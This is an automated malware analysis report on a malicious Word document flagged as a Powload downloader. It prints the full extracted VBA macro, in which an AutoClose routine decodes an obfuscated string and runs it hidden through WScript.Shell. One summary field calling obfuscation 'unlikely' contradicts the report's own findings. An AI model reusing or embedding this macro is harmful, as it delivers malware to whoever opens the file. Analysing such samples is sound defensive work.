Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 a52192465084e717…

MALICIOUS

Office (OOXML)

53.2 KB Created: 2017-11-29 23:43:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2019-04-18
MD5: 45fde170eec6aca0c6db4c4044343e23 SHA-1: 8591d082074590978cf8477a727a72a19dd027a7 SHA-256: a52192465084e717ab601dda5a7d7f55530bdc206c84f634cc12467aede8c6c8
290 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is an Office document containing VBA macros. The AutoClose macro is present and uses WScript.Shell to execute a command. The script appears to download and execute a second-stage payload, as indicated by the ClamAV detection 'Doc.Downloader.Powload-6707242-0'. The obfuscated nature of the script and the lack of specific URLs prevent a more precise family attribution.

Heuristics 7

  • ClamAV: Doc.Downloader.Powload-6707242-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Powload-6707242-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
         If reoffense - overexpectation > 1 Then
       CreateObject("WScript.Shell").Run aquavit, 0
       azyme = False
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
         If reoffense - overexpectation > 1 Then
       CreateObject("WScript.Shell").Run aquavit, 0
       azyme = False
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  nonadvertence = Array("r", "R", "U", "y", "s", "O", "Q", "Z", "Q", "p", "U", "y", "y", "j", "J", "E", "E", "x", "i", "K", "r", "s", "R", "c", "a", "K", "i", "Y", "s", "c", "a", "Q", "c", "s", "U", "s", "b", "B", "O", "b", "i", "r", "E", "0", "n", "u", "E", "y", "Q", "K", "Z", "O", "j", "U", "j", "4", "g", "y", "r", "s", "I", "y", "K", "g", "r", "2")
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2148 bytes
SHA-256: 7441f6bf1775058b629f83f77d0c97a87b954fd8cc9f527d98482d6c3d5ee28a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function corkscrewed(nonadvertence)
  undecidedness = Array("I", "U", "J", "b", "Y", "y", "0", "r", "p", "Q", "B", "s", "x", "Z", "c", "K", "u", "O", "2", "j", "g", "i", "4", "E", "n", "a", "R")
  vaisya = Array("=", "h", ":", "c", "v", "t", "I", "m", " ", "e", "b", "a", "f", "x", "n", "r", "O", ".", "d", "p", "u", "o", "?", "/", "S", "i", "s")
  
  squawroot = vbNullString
  
  For Each gumshoeing In nonadvertence
    adoptive = midwinter(gumshoeing, undecidedness, UBound(undecidedness))
    If adoptive > -1 Then
    squawroot = vaisya(adoptive) & squawroot
    End If
  Next
  
  corkscrewed = StrReverse(squawroot)
  
End Function

Public Function midwinter(zanclidae, hawkings, hemoglobinometer)
  macrosplanchnic = 3
  municipal = 1992
  For macrosplanchnic = 0 To hemoglobinometer
    If hawkings(macrosplanchnic) = zanclidae Then
     municipal = macrosplanchnic
    End If
  Next

  If municipal = 1992 Then
    municipal = -1
  End If
  
  midwinter = municipal
End Function

Sub AutoClose()
  nonadvertence = Array("r", "R", "U", "y", "s", "O", "Q", "Z", "Q", "p", "U", "y", "y", "j", "J", "E", "E", "x", "i", "K", "r", "s", "R", "c", "a", "K", "i", "Y", "s", "c", "a", "Q", "c", "s", "U", "s", "b", "B", "O", "b", "i", "r", "E", "0", "n", "u", "E", "y", "Q", "K", "Z", "O", "j", "U", "j", "4", "g", "y", "r", "s", "I", "y", "K", "g", "r", "2")
  ovariosteresis = corkscrewed(nonadvertence)
  
  Application.Run "stalagmitically", ovariosteresis
  
End Sub


Private Sub stalagmitically(aquavit)
   
   overexpectation = DateDiff("s", #1/1/1970#, Now())
   azyme = True
   
   While azyme
     reoffense = overexpectation + 60
     If reoffense - overexpectation > 1 Then
       CreateObject("WScript.Shell").Run aquavit, 0
       azyme = False
      End If
     
   Wend

End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 11776 bytes
SHA-256: 0dedcaac6304169b8abf2a3b4d3fe56cf643f23bf02d1666b20f40c1562506a8
Detection
ClamAV: Doc.Downloader.Powload-6707242-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.